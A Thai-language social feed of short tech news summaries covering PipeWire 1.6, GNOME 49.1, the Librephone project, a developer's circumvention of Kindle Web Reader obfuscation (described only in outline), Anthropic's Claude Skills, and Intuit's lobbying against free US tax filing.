ยังมี binary blobs อยู่ ➡️ Librephone จะเป็นรากฐานให้กับระบบมือถือที่เสรีอย่างแท้จริง ➡️ เปิดรับอาสาสมัครทุกระดับ ไม่จำกัดเฉพาะวิศวกร ➡️ สนับสนุนได้ผ่านการบริจาค ทดสอบ เขียนเอกสาร หรือเผยแพร่ข้อมูล https://news.itsfoss.com/librephone-project-overview/
    NEWS.ITSFOSS.COM
    Free Software Foundation Is Serious About The Librephone Project [To Bring Mobile Freedom To The Masses]
    Not just another Android fork, this project aims to liberate mobile computing at its core.
    0 ความคิดเห็น 0 การแบ่งปัน 62 มุมมอง 0 รีวิว
  • “PipeWire 1.6 มาแล้ว!” — รองรับ Bluetooth ASHA สำหรับเครื่องช่วยฟัง พร้อมฟีเจอร์ใหม่เพียบสำหรับสายเสียงและวิดีโอบน Linux

    PipeWire 1.6 ซึ่งเป็นระบบจัดการเสียงและวิดีโอแบบ low-latency บน Linux ได้เข้าสู่ช่วงพัฒนาแล้ว โดยเวอร์ชันใหม่นี้มาพร้อมฟีเจอร์เด่นคือการรองรับ Bluetooth ASHA (Audio Streaming for Hearing Aid) ซึ่งช่วยให้ผู้ใช้เครื่องช่วยฟังสามารถเชื่อมต่อกับระบบเสียงของ Linux ได้โดยตรงผ่าน Bluetooth

    นอกจากนี้ยังมีการปรับปรุงหลายด้าน เช่น:
    รองรับ MIDI 2.0 clip
    เพิ่มตัวช่วยจัดการ timeout แบบใหม่
    เพิ่มตัวอย่าง config สำหรับ Dolby Surround และ Dolby Pro Logic II
    รองรับหูฟัง Razer BlackShark v3 และลำโพง Logitech Z407
    ปรับปรุงการตั้งค่า ALSA node ให้ทำงานร่วมกับ Firewire driver ได้ดีขึ้น
    เพิ่มฟีเจอร์ telephony และแก้ปัญหา packet loss สำหรับ Bluetooth codecs
    รองรับการอ่านตำแหน่ง channel จาก HDMI ELD
    เพิ่ม benchmark สำหรับ AEC แบบ offline
    รองรับ H.265 เป็น video format
    เพิ่ม ONNX filter และ FFmpeg avfilter plugin
    ปรับปรุงการเล่น DSD ด้วย pw-cat
    รองรับ metadata และ latency ใน filter-graph
    เพิ่มความสามารถให้ plugin filter-graph รับได้ถึง 8 channel

    PipeWire 1.6 ยังมีการปรับปรุงด้านความปลอดภัย เช่น การ rewrite parser ของ control stream ให้ปลอดภัยจาก concurrent update และการ lock loop ด้วย priority inversion

    ผู้ใช้สามารถดาวน์โหลด Release Candidate ได้จาก GitLab ของโครงการ แต่ควรทราบว่านี่เป็นเวอร์ชัน pre-release ที่ยังไม่เหมาะกับการใช้งานจริงในระบบ production

    ข้อมูลในข่าว
    PipeWire 1.6 รองรับ Bluetooth ASHA สำหรับเครื่องช่วยฟัง
    เพิ่ม MIDI 2.0 clip support และ timer-queue helper
    มี config ตัวอย่างสำหรับ Dolby Surround และ Pro Logic II
    รองรับอุปกรณ์ใหม่ เช่น Razer BlackShark v3 และ Logitech Z407
    ปรับปรุง ALSA node สำหรับ Firewire driver
    เพิ่มฟีเจอร์ telephony และแก้ packet loss สำหรับ Bluetooth codecs
    รองรับ HDMI ELD, offline AEC benchmark และ H.265 video format
    เพิ่ม ONNX filter และ FFmpeg plugin
    ปรับปรุง DSD playback, metadata, latency และ channel support
    ปรับ parser ให้ปลอดภัยจาก concurrent update
    รองรับ plugin filter-graph สูงสุด 8 channel
    Release Candidate พร้อมดาวน์โหลดจาก GitLab

    https://9to5linux.com/pipewire-1-6-promises-bluetooth-audio-streaming-for-hearing-aid-support
    🔊 “PipeWire 1.6 มาแล้ว!” — รองรับ Bluetooth ASHA สำหรับเครื่องช่วยฟัง พร้อมฟีเจอร์ใหม่เพียบสำหรับสายเสียงและวิดีโอบน Linux PipeWire 1.6 ซึ่งเป็นระบบจัดการเสียงและวิดีโอแบบ low-latency บน Linux ได้เข้าสู่ช่วงพัฒนาแล้ว โดยเวอร์ชันใหม่นี้มาพร้อมฟีเจอร์เด่นคือการรองรับ Bluetooth ASHA (Audio Streaming for Hearing Aid) ซึ่งช่วยให้ผู้ใช้เครื่องช่วยฟังสามารถเชื่อมต่อกับระบบเสียงของ Linux ได้โดยตรงผ่าน Bluetooth นอกจากนี้ยังมีการปรับปรุงหลายด้าน เช่น: 🎗️ รองรับ MIDI 2.0 clip 🎗️ เพิ่มตัวช่วยจัดการ timeout แบบใหม่ 🎗️ เพิ่มตัวอย่าง config สำหรับ Dolby Surround และ Dolby Pro Logic II 🎗️ รองรับหูฟัง Razer BlackShark v3 และลำโพง Logitech Z407 🎗️ ปรับปรุงการตั้งค่า ALSA node ให้ทำงานร่วมกับ Firewire driver ได้ดีขึ้น 🎗️ เพิ่มฟีเจอร์ telephony และแก้ปัญหา packet loss สำหรับ Bluetooth codecs 🎗️ รองรับการอ่านตำแหน่ง channel จาก HDMI ELD 🎗️ เพิ่ม benchmark สำหรับ AEC แบบ offline 🎗️ รองรับ H.265 เป็น video format 🎗️ เพิ่ม ONNX filter และ FFmpeg avfilter plugin 🎗️ ปรับปรุงการเล่น DSD ด้วย pw-cat 🎗️ รองรับ metadata และ latency ใน filter-graph 🎗️ เพิ่มความสามารถให้ plugin filter-graph รับได้ถึง 8 channel PipeWire 1.6 ยังมีการปรับปรุงด้านความปลอดภัย เช่น การ rewrite parser ของ control stream ให้ปลอดภัยจาก concurrent update และการ lock loop ด้วย priority inversion ผู้ใช้สามารถดาวน์โหลด Release Candidate ได้จาก GitLab ของโครงการ แต่ควรทราบว่านี่เป็นเวอร์ชัน pre-release ที่ยังไม่เหมาะกับการใช้งานจริงในระบบ production ✅ ข้อมูลในข่าว ➡️ PipeWire 1.6 รองรับ Bluetooth ASHA สำหรับเครื่องช่วยฟัง ➡️ เพิ่ม MIDI 2.0 clip support และ timer-queue helper ➡️ มี config ตัวอย่างสำหรับ Dolby Surround และ Pro Logic II ➡️ รองรับอุปกรณ์ใหม่ เช่น Razer BlackShark v3 และ Logitech Z407 ➡️ ปรับปรุง ALSA node สำหรับ Firewire driver ➡️ เพิ่มฟีเจอร์ telephony และแก้ packet loss สำหรับ Bluetooth codecs ➡️ รองรับ HDMI ELD, offline AEC benchmark และ H.265 video format ➡️ เพิ่ม ONNX filter และ FFmpeg plugin ➡️ ปรับปรุง DSD playback, metadata, latency และ channel support ➡️ ปรับ parser ให้ปลอดภัยจาก concurrent update ➡️ รองรับ plugin filter-graph สูงสุด 8 channel ➡️ Release Candidate พร้อมดาวน์โหลดจาก GitLab https://9to5linux.com/pipewire-1-6-promises-bluetooth-audio-streaming-for-hearing-aid-support
    9TO5LINUX.COM
    PipeWire 1.6 Promises Bluetooth Audio Streaming for Hearing Aid Support - 9to5Linux
    PipeWire 1.6 open-source server for handling audio/video streams and hardware on Linux is now available for public beta testing.
    0 ความคิดเห็น 0 การแบ่งปัน 60 มุมมอง 0 รีวิว
  • “GNOME 49.1 มาแล้ว!” — อัปเดตครั้งใหญ่เพื่อความเสถียร ความเข้าถึง และประสบการณ์ผู้ใช้ที่ดีขึ้น

    GNOME Project ได้ปล่อย GNOME 49.1 ซึ่งเป็นอัปเดตแรกของซีรีส์ GNOME 49 “Brescia” โดยเน้นการแก้ไขบั๊กและปรับปรุงประสบการณ์ใช้งานในหลายส่วนของเดสก์ท็อป รวมถึง Nautilus, Epiphany, GNOME Shell, Mutter, Orca และ GNOME Software

    การเปลี่ยนแปลงสำคัญ ได้แก่:
    ปรับปรุง UI การจับภาพหน้าจอให้เข้าถึงง่ายขึ้น
    รองรับการพิมพ์ภาษาฮินดีแบบ Bolnagri บนคีย์บอร์ดจอสัมผัส
    ปรับปรุงไอคอนการเข้าถึงบนหน้าจอล็อกอิน
    แก้ไขปัญหาการแจ้งเตือนอัปเดตใน GNOME Software
    แก้ไขบั๊กที่ทำให้เกิด zombie process จาก gnome-session
    แก้ไขปัญหาโฟกัสคีย์บอร์ดใน Activities Overview
    แก้ไขปัญหา GTK popover submenu ที่ทำให้แอปค้าง
    แก้ไขปัญหาหน้าต่าง maximized ล้นใต้ panel
    แก้ไขการสลับ layout คีย์บอร์ดผ่าน xkb-options

    ใน Nautilus (Files):
    แก้ไขการ crash จาก callback ภายใน
    แก้ไขการ paste รูปภาพขนาดใหญ่
    ปรับปรุง contrast ของรายการที่ถูก cut
    แก้ไขการโฟกัสในหน้าต่างเลือกแอปเริ่มต้น
    แก้ไข sidebar drag-and-drop และการทดสอบ archive ที่ใช้เวลานาน

    ใน Epiphany (GNOME Web):
    ปรับปรุง address bar และ dropdown behavior
    แก้ไขการแสดงผลตัวอักษร non-Latin
    เพิ่ม OpenSearch ให้ DuckDuckGo, Bing และ Google
    แก้ไข caret position หลัง Ctrl+K
    แก้ไข favicon ที่มีพื้นหลังดำให้โปร่งใส

    ใน Orca (screen reader):
    เพิ่มการควบคุม caret สำหรับทุก text object
    เพิ่มคำสั่งใหม่ผ่าน D-Bus Remote Controller
    ปรับปรุงการอ่าน voice name และการจัดเรียงใน Preferences
    เพิ่ม OnlyShowIn=GNOME ให้ Orca autostart ได้ในเวอร์ชันเก่า

    GNOME Control Center ก็ได้รับการปรับปรุงหลาย panels เช่น Appearance, Date & Time, Mouse, Network, Users และ Wacom ส่วน GNOME Display Manager (GDM) ได้รับ hotfix สำหรับบั๊กที่ทำให้ GNOME Shell ค้าง และการตรวจสอบ Wayland ที่ผิดพลาด

    ข้อมูลในข่าว
    GNOME 49.1 เป็นอัปเดตแรกของซีรีส์ GNOME 49 “Brescia”
    ปรับปรุง accessibility, multi-touch, และการจัดการคีย์บอร์ด
    แก้ไข zombie process จาก gnome-session
    Nautilus ได้รับการแก้ไขหลายจุด เช่น paste รูปภาพ, contrast, drag-and-drop
    Epiphany ปรับปรุง address bar, dropdown, และรองรับ OpenSearch
    Orca เพิ่ม caret navigation และปรับปรุง voice name presentation
    GNOME Software แก้ไขการแจ้งเตือนอัปเดต
    GNOME Control Center ปรับปรุงหลาย panels
    GDM ได้รับ hotfix สำหรับบั๊กที่ทำให้ GNOME Shell ค้าง

    https://9to5linux.com/gnome-49-1-desktop-released-with-various-improvements-and-bug-fixes
    🖥️ “GNOME 49.1 มาแล้ว!” — อัปเดตครั้งใหญ่เพื่อความเสถียร ความเข้าถึง และประสบการณ์ผู้ใช้ที่ดีขึ้น GNOME Project ได้ปล่อย GNOME 49.1 ซึ่งเป็นอัปเดตแรกของซีรีส์ GNOME 49 “Brescia” โดยเน้นการแก้ไขบั๊กและปรับปรุงประสบการณ์ใช้งานในหลายส่วนของเดสก์ท็อป รวมถึง Nautilus, Epiphany, GNOME Shell, Mutter, Orca และ GNOME Software การเปลี่ยนแปลงสำคัญ ได้แก่: ⭐ ปรับปรุง UI การจับภาพหน้าจอให้เข้าถึงง่ายขึ้น ⭐ รองรับการพิมพ์ภาษาฮินดีแบบ Bolnagri บนคีย์บอร์ดจอสัมผัส ⭐ ปรับปรุงไอคอนการเข้าถึงบนหน้าจอล็อกอิน ⭐ แก้ไขปัญหาการแจ้งเตือนอัปเดตใน GNOME Software ⭐ แก้ไขบั๊กที่ทำให้เกิด zombie process จาก gnome-session ⭐ แก้ไขปัญหาโฟกัสคีย์บอร์ดใน Activities Overview ⭐ แก้ไขปัญหา GTK popover submenu ที่ทำให้แอปค้าง ⭐ แก้ไขปัญหาหน้าต่าง maximized ล้นใต้ panel ⭐ แก้ไขการสลับ layout คีย์บอร์ดผ่าน xkb-options ใน Nautilus (Files): 🗃️ แก้ไขการ crash จาก callback ภายใน 🗃️ แก้ไขการ paste รูปภาพขนาดใหญ่ 🗃️ ปรับปรุง contrast ของรายการที่ถูก cut 🗃️ แก้ไขการโฟกัสในหน้าต่างเลือกแอปเริ่มต้น 🗃️ แก้ไข sidebar drag-and-drop และการทดสอบ archive ที่ใช้เวลานาน ใน Epiphany (GNOME Web): 🌐 ปรับปรุง address bar และ dropdown behavior 🌐 แก้ไขการแสดงผลตัวอักษร non-Latin 🌐 เพิ่ม OpenSearch ให้ DuckDuckGo, Bing และ Google 🌐 แก้ไข caret position หลัง Ctrl+K 🌐 แก้ไข favicon ที่มีพื้นหลังดำให้โปร่งใส ใน Orca (screen reader): 🔊 เพิ่มการควบคุม caret สำหรับทุก text object 🔊 เพิ่มคำสั่งใหม่ผ่าน D-Bus Remote Controller 🔊 ปรับปรุงการอ่าน voice name และการจัดเรียงใน Preferences 🔊 เพิ่ม OnlyShowIn=GNOME ให้ Orca autostart ได้ในเวอร์ชันเก่า GNOME Control Center ก็ได้รับการปรับปรุงหลาย panels เช่น Appearance, Date & Time, Mouse, Network, Users และ Wacom ส่วน GNOME Display Manager (GDM) ได้รับ hotfix สำหรับบั๊กที่ทำให้ GNOME Shell ค้าง และการตรวจสอบ Wayland ที่ผิดพลาด ✅ ข้อมูลในข่าว ➡️ GNOME 49.1 เป็นอัปเดตแรกของซีรีส์ GNOME 49 “Brescia” ➡️ ปรับปรุง accessibility, multi-touch, และการจัดการคีย์บอร์ด ➡️ แก้ไข zombie process จาก gnome-session ➡️ Nautilus ได้รับการแก้ไขหลายจุด เช่น paste รูปภาพ, contrast, drag-and-drop ➡️ Epiphany ปรับปรุง address bar, dropdown, และรองรับ OpenSearch ➡️ Orca เพิ่ม caret navigation และปรับปรุง voice name presentation ➡️ GNOME Software แก้ไขการแจ้งเตือนอัปเดต ➡️ GNOME Control Center ปรับปรุงหลาย panels ➡️ GDM ได้รับ hotfix สำหรับบั๊กที่ทำให้ GNOME Shell ค้าง https://9to5linux.com/gnome-49-1-desktop-released-with-various-improvements-and-bug-fixes
    9TO5LINUX.COM
    GNOME 49.1 Desktop Released with Various Improvements and Bug Fixes - 9to5Linux
    GNOME 49.1 is now available as the first point release to the latest GNOME 49 desktop environment series with various bug fixes.
    0 ความคิดเห็น 0 การแบ่งปัน 71 มุมมอง 0 รีวิว
  • คงเข้าใจว่าครั้งหน้าจักกลับมาใช้ต่อในรูปใหม่ ... หมาแมวจิ้งจกตุ๊กแก หนูในเรือน
    #ไร้สาระกับลุงทุเรียนกวน
    คงเข้าใจว่าครั้งหน้าจักกลับมาใช้ต่อในรูปใหม่ ... หมาแมวจิ้งจกตุ๊กแก หนูในเรือน #ไร้สาระกับลุงทุเรียนกวน
    0 ความคิดเห็น 0 การแบ่งปัน 23 มุมมอง 0 0 รีวิว
  • “เมื่อ Kindle ไม่ให้ดาวน์โหลดหนังสือที่ซื้อ — นักพัฒนาแฮกระบบเว็บเพื่ออ่านในแอปที่ตัวเองเลือก”

    Pixelmelt นักพัฒนาสายแฮกเกอร์สายเทคนิค ได้เขียนบล็อกเล่าประสบการณ์สุดหัวร้อนหลังซื้อ eBook จาก Amazon แล้วพบว่าไม่สามารถอ่านผ่านแอปอื่นได้เลย Kindle Android app ก็ดันแครชซ้ำ ๆ ส่วน Kindle Web Reader ก็ไม่ให้ดาวน์โหลดไฟล์หรือ export ไปยัง Calibre ซึ่งเป็นแอปจัดการหนังสือยอดนิยมของสาย eBook

    เขาจึงตัดสินใจ “reverse-engineer” ระบบ obfuscation ของ Kindle Web Reader เพื่อดึงข้อมูลหนังสือออกมาอ่านในแอปที่ตัวเองเลือก โดยพบว่า Amazon ใช้เทคนิคซับซ้อนหลายชั้นเพื่อป้องกันการเข้าถึงเนื้อหาจริง เช่น:
    การแปลงตัวอักษรเป็น glyph ID แบบสุ่ม
    การเปลี่ยน mapping ทุก 5 หน้า
    การฝัง path SVG ที่ทำให้ parser ภายนอกอ่านผิด
    การใช้หลาย font variant และ ligature
    การจำกัด API ให้โหลดได้ทีละ 5 หน้าเท่านั้น

    Pixelmelt ลองใช้ OCR แต่ล้มเหลว จึงหันมาใช้เทคนิค “pixel-perfect matching” โดยเรนเดอร์ glyph เป็นภาพ แล้วใช้ perceptual hash และ SSIM เพื่อจับคู่กับตัวอักษรจากฟอนต์ Bookerly ที่ Amazon ใช้

    ผลลัพธ์คือ เขาสามารถถอดรหัส glyph ทั้งหมด 361 แบบจากหนังสือ 920 หน้า และสร้างไฟล์ EPUB ที่มีการจัดรูปแบบเหมือนต้นฉบับแทบทุกประการ

    เขาย้ำว่าเป้าหมายไม่ใช่การละเมิดลิขสิทธิ์ แต่เพื่ออ่านหนังสือที่ “ซื้อมาแล้ว” ในแอปที่ตัวเองเลือก และเพื่อเรียนรู้เทคนิคด้าน SVG, hashing และ font metrics

    ข้อมูลในข่าว
    นักพัฒนาไม่สามารถอ่าน eBook ที่ซื้อจาก Amazon ในแอปอื่นได้
    Kindle Android app แครช และ Web Reader ไม่ให้ดาวน์โหลดหรือ export
    Amazon ใช้ระบบ obfuscation หลายชั้นเพื่อป้องกันการเข้าถึงเนื้อหา
    ตัวอักษรถูกแปลงเป็น glyph ID แบบสุ่ม และเปลี่ยนทุก 5 หน้า
    API จำกัดให้โหลดได้ทีละ 5 หน้า
    glyphs ถูกฝังด้วย path SVG ที่ทำให้ parser อ่านผิด
    ใช้หลาย font variant เช่น bold, italic, ligature
    OCR ล้มเหลวในการจับคู่ glyph กับตัวอักษร
    ใช้ perceptual hash และ SSIM เพื่อจับคู่ glyph กับฟอนต์ Bookerly
    ถอดรหัส glyph ได้ครบ 361 แบบจากหนังสือ 920 หน้า
    สร้างไฟล์ EPUB ที่มีการจัดรูปแบบเหมือนต้นฉบับ
    ย้ำว่าเป้าหมายคือการอ่านหนังสือที่ซื้อมาแล้ว ไม่ใช่ละเมิดลิขสิทธิ์
    ได้เรียนรู้เทคนิคด้าน SVG rendering, hashing และ font metrics

    https://blog.pixelmelt.dev/kindle-web-drm/
    📚 “เมื่อ Kindle ไม่ให้ดาวน์โหลดหนังสือที่ซื้อ — นักพัฒนาแฮกระบบเว็บเพื่ออ่านในแอปที่ตัวเองเลือก” Pixelmelt นักพัฒนาสายแฮกเกอร์สายเทคนิค ได้เขียนบล็อกเล่าประสบการณ์สุดหัวร้อนหลังซื้อ eBook จาก Amazon แล้วพบว่าไม่สามารถอ่านผ่านแอปอื่นได้เลย Kindle Android app ก็ดันแครชซ้ำ ๆ ส่วน Kindle Web Reader ก็ไม่ให้ดาวน์โหลดไฟล์หรือ export ไปยัง Calibre ซึ่งเป็นแอปจัดการหนังสือยอดนิยมของสาย eBook เขาจึงตัดสินใจ “reverse-engineer” ระบบ obfuscation ของ Kindle Web Reader เพื่อดึงข้อมูลหนังสือออกมาอ่านในแอปที่ตัวเองเลือก โดยพบว่า Amazon ใช้เทคนิคซับซ้อนหลายชั้นเพื่อป้องกันการเข้าถึงเนื้อหาจริง เช่น: 🔡 การแปลงตัวอักษรเป็น glyph ID แบบสุ่ม 🔡 การเปลี่ยน mapping ทุก 5 หน้า 🔡 การฝัง path SVG ที่ทำให้ parser ภายนอกอ่านผิด 🔡 การใช้หลาย font variant และ ligature 🔡 การจำกัด API ให้โหลดได้ทีละ 5 หน้าเท่านั้น Pixelmelt ลองใช้ OCR แต่ล้มเหลว จึงหันมาใช้เทคนิค “pixel-perfect matching” โดยเรนเดอร์ glyph เป็นภาพ แล้วใช้ perceptual hash และ SSIM เพื่อจับคู่กับตัวอักษรจากฟอนต์ Bookerly ที่ Amazon ใช้ ผลลัพธ์คือ เขาสามารถถอดรหัส glyph ทั้งหมด 361 แบบจากหนังสือ 920 หน้า และสร้างไฟล์ EPUB ที่มีการจัดรูปแบบเหมือนต้นฉบับแทบทุกประการ เขาย้ำว่าเป้าหมายไม่ใช่การละเมิดลิขสิทธิ์ แต่เพื่ออ่านหนังสือที่ “ซื้อมาแล้ว” ในแอปที่ตัวเองเลือก และเพื่อเรียนรู้เทคนิคด้าน SVG, hashing และ font metrics ✅ ข้อมูลในข่าว ➡️ นักพัฒนาไม่สามารถอ่าน eBook ที่ซื้อจาก Amazon ในแอปอื่นได้ ➡️ Kindle Android app แครช และ Web Reader ไม่ให้ดาวน์โหลดหรือ export ➡️ Amazon ใช้ระบบ obfuscation หลายชั้นเพื่อป้องกันการเข้าถึงเนื้อหา ➡️ ตัวอักษรถูกแปลงเป็น glyph ID แบบสุ่ม และเปลี่ยนทุก 5 หน้า ➡️ API จำกัดให้โหลดได้ทีละ 5 หน้า ➡️ glyphs ถูกฝังด้วย path SVG ที่ทำให้ parser อ่านผิด ➡️ ใช้หลาย font variant เช่น bold, italic, ligature ➡️ OCR ล้มเหลวในการจับคู่ glyph กับตัวอักษร ➡️ ใช้ perceptual hash และ SSIM เพื่อจับคู่ glyph กับฟอนต์ Bookerly ➡️ ถอดรหัส glyph ได้ครบ 361 แบบจากหนังสือ 920 หน้า ➡️ สร้างไฟล์ EPUB ที่มีการจัดรูปแบบเหมือนต้นฉบับ ➡️ ย้ำว่าเป้าหมายคือการอ่านหนังสือที่ซื้อมาแล้ว ไม่ใช่ละเมิดลิขสิทธิ์ ➡️ ได้เรียนรู้เทคนิคด้าน SVG rendering, hashing และ font metrics https://blog.pixelmelt.dev/kindle-web-drm/
    BLOG.PIXELMELT.DEV
    How I Reversed Amazon's Kindle Web Obfuscation Because Their App Sucked
    As it turns out they don't actually want you to do this (and have some interesting ways to stop you)
    0 ความคิดเห็น 0 การแบ่งปัน 62 มุมมอง 0 รีวิว
  • “Claude Skills โดย Anthropic” — สร้าง AI ที่รู้จริงในงานของคุณ ด้วยระบบเสริมความสามารถแบบกำหนดเอง

    Anthropic เปิดตัว “Claude Skills” ซึ่งเป็นระบบเสริมความสามารถให้ Claude ทำงานเฉพาะทางได้ดีขึ้น โดยใช้โครงสร้างแบบ “skill folder” ที่บรรจุคำสั่ง, สคริปต์ และไฟล์ที่จำเป็น Claude จะโหลด skill เฉพาะเมื่อจำเป็นต่อภารกิจนั้น ๆ เพื่อให้ทำงานเร็วและแม่นยำ

    Claude Skills ทำงานได้กับทุกผลิตภัณฑ์ของ Claude — ทั้ง Claude apps, Claude Code และ API โดยผู้ใช้สามารถสร้าง skill เองได้ผ่าน “skill-creator” ซึ่งเป็น skill พิเศษที่ช่วยตั้งโครงสร้างโฟลเดอร์, เขียนไฟล์ SKILL.md และจัดการ resource โดยไม่ต้องแก้ไขไฟล์ด้วยตนเอง

    ฟีเจอร์เด่นของ Claude Skills:

    Composable: Claude สามารถใช้หลาย skill พร้อมกันและประสานการทำงานอัตโนมัติ
    Portable: สร้างครั้งเดียว ใช้ได้ทุกแพลตฟอร์มของ Claude
    Efficient: โหลดเฉพาะข้อมูลที่จำเป็นเท่านั้น
    Powerful: skill สามารถมีโค้ดที่รันได้จริง ไม่ใช่แค่ข้อความคำสั่ง

    ในฝั่งนักพัฒนา API มี endpoint ใหม่ /v1/skills สำหรับจัดการเวอร์ชัน skill และต้องเปิดใช้ Code Execution Tool beta เพื่อให้ Claude รันโค้ดได้อย่างปลอดภัย

    องค์กรต่าง ๆ เช่น Box, Notion, Canva และ Rakuten ได้ใช้ Claude Skills เพื่อปรับแต่งการทำงานให้ตรงกับบริบทของตน เช่น สร้างเอกสารตามมาตรฐานองค์กร, ทำงานร่วมกับ Notion ได้เร็วขึ้น, หรือวิเคราะห์ spreadsheet ทางบัญชีได้แม่นยำ

    ข้อมูลในข่าว
    Claude Skills คือระบบเสริมความสามารถให้ Claude ทำงานเฉพาะทางได้ดีขึ้น
    ใช้โครงสร้าง skill folder ที่มีคำสั่ง, สคริปต์ และ resource
    Claude โหลด skill เฉพาะเมื่อจำเป็นต่อภารกิจ
    ใช้ได้กับ Claude apps, Claude Code และ API
    “skill-creator” ช่วยสร้าง skill ได้แบบ interactive โดยไม่ต้องแก้ไฟล์เอง
    Claude สามารถใช้หลาย skill พร้อมกัน (Composable)
    สร้าง skill ครั้งเดียว ใช้ได้ทุกแพลตฟอร์ม (Portable)
    โหลดเฉพาะข้อมูลที่จำเป็น (Efficient)
    skill สามารถมีโค้ดที่รันได้จริง (Powerful)
    API มี endpoint /v1/skills สำหรับจัดการ skill
    ต้องเปิดใช้ Code Execution Tool beta เพื่อรันโค้ด
    Box ใช้ Claude สร้างเอกสารจากไฟล์ที่เก็บไว้
    Notion ใช้ Claude เพื่อลดการเขียน prompt ซับซ้อน
    Canva ใช้ Claude เพื่อสร้างดีไซน์ตามบริบททีม
    Rakuten ใช้ Claude วิเคราะห์ spreadsheet และสร้างรายงาน

    https://www.anthropic.com/news/skills
    🧠 “Claude Skills โดย Anthropic” — สร้าง AI ที่รู้จริงในงานของคุณ ด้วยระบบเสริมความสามารถแบบกำหนดเอง Anthropic เปิดตัว “Claude Skills” ซึ่งเป็นระบบเสริมความสามารถให้ Claude ทำงานเฉพาะทางได้ดีขึ้น โดยใช้โครงสร้างแบบ “skill folder” ที่บรรจุคำสั่ง, สคริปต์ และไฟล์ที่จำเป็น Claude จะโหลด skill เฉพาะเมื่อจำเป็นต่อภารกิจนั้น ๆ เพื่อให้ทำงานเร็วและแม่นยำ Claude Skills ทำงานได้กับทุกผลิตภัณฑ์ของ Claude — ทั้ง Claude apps, Claude Code และ API โดยผู้ใช้สามารถสร้าง skill เองได้ผ่าน “skill-creator” ซึ่งเป็น skill พิเศษที่ช่วยตั้งโครงสร้างโฟลเดอร์, เขียนไฟล์ SKILL.md และจัดการ resource โดยไม่ต้องแก้ไขไฟล์ด้วยตนเอง ฟีเจอร์เด่นของ Claude Skills: 🧩 Composable: Claude สามารถใช้หลาย skill พร้อมกันและประสานการทำงานอัตโนมัติ 🌍 Portable: สร้างครั้งเดียว ใช้ได้ทุกแพลตฟอร์มของ Claude ⚡ Efficient: โหลดเฉพาะข้อมูลที่จำเป็นเท่านั้น 🔧 Powerful: skill สามารถมีโค้ดที่รันได้จริง ไม่ใช่แค่ข้อความคำสั่ง ในฝั่งนักพัฒนา API มี endpoint ใหม่ /v1/skills สำหรับจัดการเวอร์ชัน skill และต้องเปิดใช้ Code Execution Tool beta เพื่อให้ Claude รันโค้ดได้อย่างปลอดภัย องค์กรต่าง ๆ เช่น Box, Notion, Canva และ Rakuten ได้ใช้ Claude Skills เพื่อปรับแต่งการทำงานให้ตรงกับบริบทของตน เช่น สร้างเอกสารตามมาตรฐานองค์กร, ทำงานร่วมกับ Notion ได้เร็วขึ้น, หรือวิเคราะห์ spreadsheet ทางบัญชีได้แม่นยำ ✅ ข้อมูลในข่าว ➡️ Claude Skills คือระบบเสริมความสามารถให้ Claude ทำงานเฉพาะทางได้ดีขึ้น ➡️ ใช้โครงสร้าง skill folder ที่มีคำสั่ง, สคริปต์ และ resource ➡️ Claude โหลด skill เฉพาะเมื่อจำเป็นต่อภารกิจ ➡️ ใช้ได้กับ Claude apps, Claude Code และ API ➡️ “skill-creator” ช่วยสร้าง skill ได้แบบ interactive โดยไม่ต้องแก้ไฟล์เอง ➡️ Claude สามารถใช้หลาย skill พร้อมกัน (Composable) ➡️ สร้าง skill ครั้งเดียว ใช้ได้ทุกแพลตฟอร์ม (Portable) ➡️ โหลดเฉพาะข้อมูลที่จำเป็น (Efficient) ➡️ skill สามารถมีโค้ดที่รันได้จริง (Powerful) ➡️ API มี endpoint /v1/skills สำหรับจัดการ skill ➡️ ต้องเปิดใช้ Code Execution Tool beta เพื่อรันโค้ด ➡️ Box ใช้ Claude สร้างเอกสารจากไฟล์ที่เก็บไว้ ➡️ Notion ใช้ Claude เพื่อลดการเขียน prompt ซับซ้อน ➡️ Canva ใช้ Claude เพื่อสร้างดีไซน์ตามบริบททีม ➡️ Rakuten ใช้ Claude วิเคราะห์ spreadsheet และสร้างรายงาน https://www.anthropic.com/news/skills
    WWW.ANTHROPIC.COM
    Claude Skills: Customize AI for your workflows
    Build custom Skills to teach Claude specialized tasks. Create once, use everywhere—from spreadsheets to coding. Available across Claude.ai, API, and Code.
    0 ความคิดเห็น 0 การแบ่งปัน 58 มุมมอง 0 รีวิว
  • “20 ปีแห่งการต่อสู้ของ TurboTax” — เมื่อบริษัทซอฟต์แวร์พยายามขัดขวางคนอเมริกันจากการยื่นภาษีฟรี

    บทความจาก ProPublica เปิดเผยเบื้องหลังการล็อบบี้และกลยุทธ์ของ Intuit บริษัทเจ้าของ TurboTax ที่ใช้เวลากว่า 20 ปีในการขัดขวางไม่ให้รัฐบาลสหรัฐฯ สร้างระบบยื่นภาษีฟรีสำหรับประชาชน ทั้งที่เทคโนโลยีและข้อมูลพร้อมแล้ว

    Intuit ใช้งบประมาณมหาศาลในการล็อบบี้รัฐสภาและหน่วยงานภาษี (IRS) เพื่อผลักดันข้อตกลง “Free File” ซึ่งให้บริษัทเอกชนสร้างระบบยื่นภาษีฟรีแทนรัฐบาล แต่แฝงข้อจำกัดมากมาย เช่น:

    จำกัดเฉพาะผู้มีรายได้น้อย
    ซ่อนช่องทางฟรีจากการค้นหา
    บังคับให้ผู้ใช้ซื้อบริการเสริมที่ไม่จำเป็น

    แม้จะมีผู้ใช้หลายล้านคนที่ควรได้รับสิทธิ์ยื่นภาษีฟรี แต่กลับถูกนำไปสู่หน้าเสียเงินโดยเจตนา ผ่านการออกแบบ UX ที่ซับซ้อนและการใช้ SEO เพื่อเบี่ยงเบนการค้นหา

    Intuit ยังพยายามขัดขวางโครงการ “Direct File” ของ IRS ที่จะให้ประชาชนยื่นภาษีตรงกับรัฐบาลโดยไม่ผ่านบริษัทเอกชน โดยอ้างว่า “จะทำให้เกิดความสับสนและลดนวัตกรรม”

    ข้อมูลในข่าว
    Intuit ใช้เวลากว่า 20 ปีในการขัดขวางระบบยื่นภาษีฟรีของรัฐบาล
    ข้อตกลง Free File ให้บริษัทเอกชนสร้างระบบยื่นภาษีฟรีแทนรัฐบาล
    ระบบฟรีถูกจำกัดเฉพาะผู้มีรายได้น้อย และถูกซ่อนจากการค้นหา
    UX ถูกออกแบบให้ผู้ใช้หลงไปใช้บริการเสียเงิน
    SEO ถูกใช้เพื่อเบี่ยงเบนการค้นหาจากช่องทางฟรี
    Intuit ต่อต้านโครงการ Direct File ของ IRS
    อ้างว่า Direct File จะลดนวัตกรรมและทำให้ผู้ใช้สับสน
